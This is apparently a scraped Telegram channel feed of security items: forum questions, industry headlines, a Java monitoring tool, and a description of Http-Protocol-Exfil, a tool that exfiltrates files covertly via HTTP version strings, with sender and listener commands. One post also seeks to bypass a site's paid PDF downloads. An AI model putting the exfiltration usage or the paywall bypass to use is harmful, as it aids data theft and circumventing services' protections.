Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Input validation on server side can be seen on http response

It's a good practice to perform input validation on server side as end user can't tamper with it. However, there have been a cases where this validation can be seen via http response in JSON form or JavaScript.

Even though this is better than client side validation alone, I believe this is still a bad security practice as end user can see what is being filtered and what is not.

What is your recommendation for a cases like this?

submitted by /u/w0lfcat
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
I want to download paid pdfs from this website for free, Any Idea how I can go about doing that?

So basically, I made a resume on https://novoresume.com/ but some templates aren't free, do you have any idea how I can bypass their premium upgrade and download the pdf for free? Maybe a tool or something that'll scan the website or url and find the pdf and download it? Sorry if this is not clear, I'm new to this.

submitted by /u/Life-Influence8893
[link] [comments]
Dark Reading: Attacks/Breaches
Cyber Conflict Between US and Iran Heats Up

The United States, United Kingdom, and Australia warn attacks from groups linked to Iran are on the rise, while the Iranian government blames the US and Israel for an attack on gas pumps.
Dark Reading: Attacks/Breaches
Can I Have XDR Without EDR?

Yes, extended detection and response is possible without endpoint detection and response, but here's why having both is helpful.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Palo Alto Networks Delivers What's Next in Security at Ignite '21

Cybersecurity company introduces solutions aimed at network security, cloud security and security operations.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Sift Acquires Passwordless Authentication Pioneer Keyless to Provide Secure, Frictionless Authentication

Biometric authentication innovator eliminates password-based account takeover and enables PSD2 Strong Customer Authentication while preserving user privacy.
JVMXRay - Make Java Security Events Of Interest Visible For Analysis

JVMXRay is a technology for monitoring access to system resources within the Java Virtual Machine. It’s designed with application security emphasis but some will also find it beneficial for software quality processes and diagnostics.More about Oracle Java Duke mascot... Contact/Chat GroupNew chat information forthcoming.BenefitsFollowing is a quick list of some of the more important benefits.Identify protected resourcesTrack different types of events of interest related to sockets, files, process execution, and more. When an event of interest occurs, process it as you wish. At the moment, adaptors for the system console (e.g., System.out), logback, and Java Logging, are available with others in process.No code changes requiredJVMXRay does not require any changes to your application source code to work. The code is pulled into the JVM by a command line option. The solution is 100% Java code so it runs anywhere.Supply chain insightsAn ancilary benefit of not requiring source code is that JVMXRay provides insight into your applications dependencies including 3rd party libraries (e.g. Jar files). Events provide the source of origin where your classes where loaded when the event is generated.Extensible & OpenDon't see an adapter or filter that works for you and know how to code? Roll up your sleeves and write one. It's extensible. Fix a bug and submit a pull requrest. All the source code is available.INFORMATION:Consider this early stage code. Thar be dragons mate. You were warned!AudienceThe anticipated audience for JVMXRay is two-fold,Systems AdministratorsIndividuals charged with system security and interested in new methods to gather security inteligence into Java applications.Security Developers & ArchitectsIndiviudals interested in improved security intelligence about their applications.Deploying JVMXRay with ExamplesThe following provides some basic information to download and compile JVMXRay source on your computer. Remainder of the video shows how to get JVMXRay working with Tomcat and work with Tomcat's examples. Sample Output...The output from this technology can be presented in different ways. What does the sample log output look like? Output formats are flexible the following is a sample of the type of information JVMXRay captures for you.-1,-1,1623791226603,main-1,EXIT,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,100,,-1,-1,1623791226603,main-1,LINK,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,mylib.dll,,-1,-1,1623791226619,main-1,FILE_READ_WITH_FILEDESCRIPTOR,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,java.io.FileDescriptor@6be46e8f,,-1,-1,1623791226620,main-1,FILE_READ_WITH_CONTEXT,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,redsecuritymanagertest3-11060405012461211247.tmp,java.security.AccessControlContext@363a949e,-1,-1,1623791226621,main-1,PERMISSION,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,org.jvmxray.TestPermission,testpermissionname1,testaction1-1,-1,1623791226628,main-1,PERMISSION_WITH_CONTEXT,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,testpermissionname1,testaction1,org.jvmxray.RedSecurityManagerTest@47f6473-1,-1,1623791226629,main-1,SOCKET_ACCEPT,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,localhost,1234,-1,-1,1623791226631,main-1,FILE_DELETE,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,redsecuritymanagertest6-5182052521633743041.tmp,,-1,-1,1623791226631,main-1,SOCKET_LISTEN,1bd99e2f195004a5-5cb63e19-179fd6e8882-8000,,123,,How it WorksThe Java Virtual Machine provides a robust security framework for controlling access to protected resources. JVMXRay provides an implementation of the java.lang.SecurityManager component, called NullSecurityManager. Ironically, the NullSecurityManager provides no policy enforcement but instead monitors activities to protected resources. It's expected other cloud log processing tools, big data tools, or cloud secuirty tools will process these events into meaningful contextual information.Project Leader(s)Milton SmithDownload Jvmxray
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Some Amazing and cool websites which help in programming and hacking

I want to share some useful websites for programming and hacking , I think you may not know about these websites.

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack the Box Overflow Walkthrough

This machine is still active. Once it has been retired, the walkthrough will be posted here.

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Http-Protocol-Exfil : Exfiltrate Files Using The HTTP Protocol Version (“HTTP/1.0” Is A 0 And “HTTP/1.1” Is A 1)

Http-Protocol-Exfil uses HTTP protocol version to send a file bit by bit (“HTTP/1.0” is a 0 and “HTTP/1.1” is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).

Create Listener

To run the listener use listener.py with one optional argument: the port it will be listening in.

python3 listener.py [PORT]

Example:

python3 listener.py 8080

Send a file

To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).

python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

Example:

python3 sender.py -u “http://127.0.0.1:8080” -i test.txt -o updated_test.txt

Example

First the file is sent:
https://blogger.googleusercontent.com/img/a/AVvXsEixQyKDZW7fjignSHiObL48pH-V1Ck71xiUGl5uENUN1rrrJmR0O-uA_VnlHDPpsdaQbN3a-XVlBNfjPvuQdIxsKypx9fbdm_JBB5AmADWs6HPVEcCvdIjKU9CS8oOTQstFCm8AI_H1p9e7qtm7oBOOvWJ_e7bLQWW6i5wa0fWgXR6psTlu-lT9fNlQ=s765
If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:
https://blogger.googleusercontent.com/img/a/AVvXsEiPUMjXB76aWNjWrYrM0aDnA0R84OEYFpWCr-CLW74xyRKoRBWhtEnxRLUqdenj3OrG0JFdGe84t5_WN_vCk33d5Mq8xvu2JM_mBRUz-jl6JebZOnwtUTe9tpdqz4FvNeEPwlRVhpVy0J3VYbOg_SbeUrZuCjqprwC3S4OA3-7KcNRLJDw4fw5HN2Rs=s687
The new file is created with the content of the input file:
https://blogger.googleusercontent.com/img/a/AVvXsEghRvcBcEbB26zuXPOcCiyFgUnG0_AsUchYrZctUpFCxxx4AzCZbj8HY-NSC01c_rcTZ3fkUsaub-r-jSs2NlDbwJ2z9TFoyurNd3wzXS5EjJMojQ7Gws3CrZewV0okjUIFHngl-O-roiKIXX_LRy1tiJsL29gbWxl3aDJmsoyUi5KJIEmPPT8I_W4q=s506

Download